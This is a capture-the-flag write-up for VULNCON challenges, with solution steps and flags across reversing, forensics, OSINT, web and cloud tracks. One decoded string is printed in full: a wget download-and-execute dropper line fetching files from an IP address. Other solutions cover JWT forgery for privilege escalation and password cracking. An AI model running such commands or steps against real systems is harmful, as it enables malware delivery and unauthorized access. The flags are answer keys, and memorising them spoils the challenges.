Binary/Malware Analyst Track

Traceless Traceback
100
reverse engineeering @W1LDQU4K3
A devastating ransomware attack left VULNCON, a prominent cybersecurity organization,
reeling from significant losses, urgent measures were required for their incident response
capabilities. The organization's budget constraints, however, meant they couldn't afford a critical
tool essential for their recovery. Harnessing the skills of their talented team of reverse engineers,
VULNCON devised a daring plan.

They turned to you, their trusted specialist in the realm of reversing, with a singular mission:
reverse-engineer the elusive software and find the license key that would unlock their path to
recovery.

recover

While decompiling u can see that they are dng xor with index values from 0 to 134 and u will get
output as
wget -q '34.93.47.31/loader'; wget -q '34.93.47.31/libfoo.so'; chmod +x loader; chmod +x
libfoo.so; ./loader; rm loader; rm libfoo.so;

After executing those commands decompile the libfoo.so

long long foo()
{
char v0; // [bp-0x38]

printf("Enter the license Key: ");

fgets(&v0, 35, *((long long *)&stdin));
::0x401080::logic(&v0);
return ::0x401070::flag_check();
}

They are calling logic function

def cc(a):
a=int(a,2)
b=a>>8
c=a- (b<<8)
return [b,c]
v0="11001001100010 11010001100100 110010100110000 11000100110000 11001100110101
110000100110101 110011001100100 11011001100101 110011000111000 11100100110111
110001100110111 11001101100100 110000100110000 11011100110001 110010000110010
110011000110100"
l=[]
for i in v0.split(" "):
l+=cc(i)
for i in l:
print(chr(i),end="")
print(len(l))
The above operations were done in the logic function
We having output and we know that the operation done is left shift so to reverse do right shift get
the first value and again do left shift to first value and subtract from the output u will get both the
values

Flag :- vulncon{2b4de01035a5fd6ef897c73da071d2f432}

Unravel the ransom

50
reverse engineering @W1LDQU4K3
There was a devastating ransomware attack on VULNCON, a renowned cybersecurity
organization, a critical file containing vital information has been encrypted beyond reach. As part
of the response team, you, a skilled reverse engineering specialist, have been entrusted with the
task of unraveling this puzzle. The organization has procured a decryptor tool that promises to
unlock the encrypted file, but there's a significant hurdle: no one knows the password needed to
initiate the decryption process.
With time ticking and stakes high, your mission is clear—to unearth the elusive password and
restore access to the invaluable data.

NOTE: flag format - vulncon{md5_hash_of_found_value}

decryptor.zip

secret.txt.ENC

Open the exe file in dot peek and u can see there is a base64 pass which is 232<?>9?

The password “ 232<?>9?” which is encrypted four times with a number using xor operation

Note that the num is changing every time while encrypting initially the num is 8
Since we are reversing use those values in reverse order to decrypt the password

So the decrypted password is 98974524

Now add the secret.txt.ENC in decryptor
After decrypting check the secret.txt file
Your Flag is vulncon{6599edfaacb379cde21d31edde92421c}

Binary Breakout
20
reverse engineering @W1LDQU4K3
In the realm of cybersecurity challenges, the renowned organization VULNCON is currently
hosting an engaging Capture The Flag (CTF). As part of their preparations, the developers are
diligently crafting a state-of-the-art dashboard to facilitate the CTF experience. However, during
the testing phase, an intriguing test challenge was introduced to the dashboard, only to encounter
unexpected errors.

As a developer in VULNCON, Your task is to fix the error and solve the test challenge to verify
the working of the dashboard.

Note: flag format vulncon{md5_hash_of_found_value}

ctfdashboard

for (; *((int *)&v0); v0 = (unsigned int)(*((int *)&v0) * 1717986919 >> 34) - (*((int *)&v0) >>
31))
 {
v4 += 1;
v7 = *((int *)&v0);
v2 = (v7 * 1717986919 >> 34) - (v7 >> 31);
v2 = (unsigned int)v7 - 5 * v2 * 2;
v3 = v2 + 5 * v3 * 2;
}
if (v3 != 138087949)
{
(unsigned int)v6 = printf("Incorrect flag");
return v6;
}
(unsigned int)v6 = printf("Whatever you submitted just now is your welcome bonus but donot
forgot to convert it to flag correct format.");
return v6;

Its just reverse function

Vulncon{f60756619e82d9957502304b1d85b362}
Forensics Investigator Track

Tagged
20
forensics @warl0ck_wraith
Do you like images?? I feel like behind every image there's a story hidden.

PS: Change Flag format to vulncon{} while submitting

logo.png

Use zsteg
Cipher :-
3842494d04040000000000171c0250001276756c6e636f6e7b763372795f336173797d00
Flag :- vulncon{v3ry_3asy}

Noobie Track

Hackkarrmon!
30
noobie :)
Are you a noobie in cyber security? Start from here!

P.S. do you know usually I hate tagging along with hidden motives... but this time maybe I need
to!

There is a hint in question taggin along with hidden so check the hidden tag

This flag is safe with me!

vulncon{4hh_w3ll_17_w45n'7_7h47_d1ff1cul7_0r_w45_17?}
SOC Analyst Track

Analysis
30
forensics @warl0ck_wraith
Can you traverse through the logs and find who infiltrated in my system? He must have left som
trail behind since he was a Joker fan

PS: Change Flag format to vulncon{} while submitting

logs.zip

Unzip the logs.zip and select all 7z and extract

Just do grep -r “vulncon{“ in the logs directory

Flag :- vulncon{analysis_done_right}

Network Security Engineer Track

C07P0Nx
50
network @ransc0rp1on
In this challenge, participants delve into intercepted VOIP traffic to uncover a hidden coupon for
conference attendees. Decrypting the coupon from the encrypted voice packets tests their
prowess in VOIP analysis.

chall.pcapng

While traversing the packets in protocol SIP there will be tinyrul which contains png files
Check all the four packets to get the flag
Threat Intelligence Analyst Track
Investigation 1
20
OSINT RCP
Dive into the cyber battleground of 2014! Sony Entertainment Pictures has been hacked!

Get ready to use your threat intel skills to find out the perpetrators and the date of the attack.

Good luck, detectives! 🔎😉

*edit - abbreviation may be enough :)

Flag format - vulncon{DD/MM/YY_group name}

Search for Sony Entertainment Pictures has been hacked! And open the wikipedia page
Flag :- vulncon{24/11/14_GOP}

Investigation 2
30
OSINT RCP
Hey there, OSINT warriors!

Congratulations on making it this far. Now it's time to put your skills to the test. Your next
challenge is to uncover the type of malware used in this cyber attack. But that's not all! You'll
also need to identify the movie that played a pivotal role in inspiring this hack.

Dig deep, connect the dots, and may your investigative instincts guide you to victory. Good luck,
and happy hunting!

● edit: replace the space with _

Flag Format - vulncon{malware type_movie name}

In same page search for malware

In same page search for movie

Flag :- vulncon{wiper_the interview}

Reverse Image Search

30
OSINT RCP

Attention, hackers!

Use your reverse image search skills to pinpoint the city and country where this ship is currently
docked. But that's not all—track down the name of the talented photographer who captured this
image.

Sharpen your eyes, follow the clues, and uncover the details.

Flag Format - vulncon{city_country_photographer_name}

View Hint
Ship.PNG

Just reverse search for Ship.PNG in google images

U will find a boat named dancing queen in marine traffic website and view those photos

Flag :- vulncon{stockholm_sweden_hartmut_knape}

Investigation 3
50
OSINT RCP

Hello again, digital detectives! 😉

The attackers have leaked a trove of data under the title "Gift of GOP" on the internet, and it was
initially uploaded to The Pirate Bay. The Pirate Bay link was pasted somewhere, but it's no
longer active. Can you time travel back to when the link was live to uncover the password for the
file?

Tap into your investigative prowess, sift through the digital trails, and crack this code. The past
holds the key—can you find it?

The clock is ticking—good luck, and happy hunting!

Please note: No need to browse or go through any .onion sites or no need to download any data.
All information were clearly mentioned in the description.
Flag format - vulncon{password}

https://pirate-proxy.ong/
In this website search for gift of gop u will get this

Flag :- vulncon{diespe123}

Security Engineer Track

Internal Leaks
100
web @bravo68dev

0xAl3x has leaked Vulncon's Internals Docs on Dark Web. Can you find out what they are hiding
from everyone behind the scenes?

http://7ebo2vvc4cmwmzvukmjtwqdfdnb7njagz6ipirbbpyfvhspqpiah2lqd.onion/index.html

Open the above onion link in tor browser from there u will get a file vulnc0n.enc which is

vulnc0n.enc: PGP message Symmetrically Encrypted Data

After decrypting u will get https://files.catbox.moe/wecix6.zip

Now u will have the source code and go through all the files inside the pfshare

After go through the source code u will get to understand how the application works

Users from 1 to 100 are role of user

Users from 101 and 102 are developer and 103 is sysadmin
There will be public and private key in 0xal3x repo

The message will be in the api repo

If u decrypt that u will get the token
With this token login as developer u will get a jwt key
If you decrypt this message u will get private rsa key and with that get public rsa key

And then apply into the token and change id to 103 and role to sysadmin
Now paste this token in uploads directory u will get the flag
\

Flag :- vulncon{4p1_p3nt35t1ng_15_c00l_h4ck}

Cloud Security Engineer Track

Baby Breach
50
cloud @gr33nm0nk

VULNCON hired new interns for hosting their website on aws. The intern has
accidentally pushed some sensitive snapshot on aws.

Can you recover the flag that is pushed to Hyderabad region by the name vulncon.
Asia Pacific (Hyderabad) ap-south-2

Configure the aws in ap-south-2

Now use chatgpt and search for the snapshot with the vulncon
After creating the volume and attaching it to the instance

Now open the ec2 instance and mount it

Flag :- vulncon{s0_y0u_kn0w_4b0u7_cl0ud_b4ckup5_b2dd04}

Cloud 2
100
cloud @gr33nm0nk

VULNCON hat einen anderen Infrastrukturspezialisten eingestellt, um ihre Ressourcen

zu warten, aber er hat einen Fehler gemacht, der uns in Schwierigkeiten bringen
könnte. Können Sie mit dieser url den Weg zum Geheimnis finden, bevor es der
Widersacher tut?

Check what are the files inside vulncon s3 storage

Now u can see there cloud-2.7z and it is password protected and crack with john u will
get the password vulnerablewoman

After extracting the file u will get all the creds to get the mysql database
Flag :- vulncon{y0u_br0k3_in_1337_h4ck3r_dea972f6dba}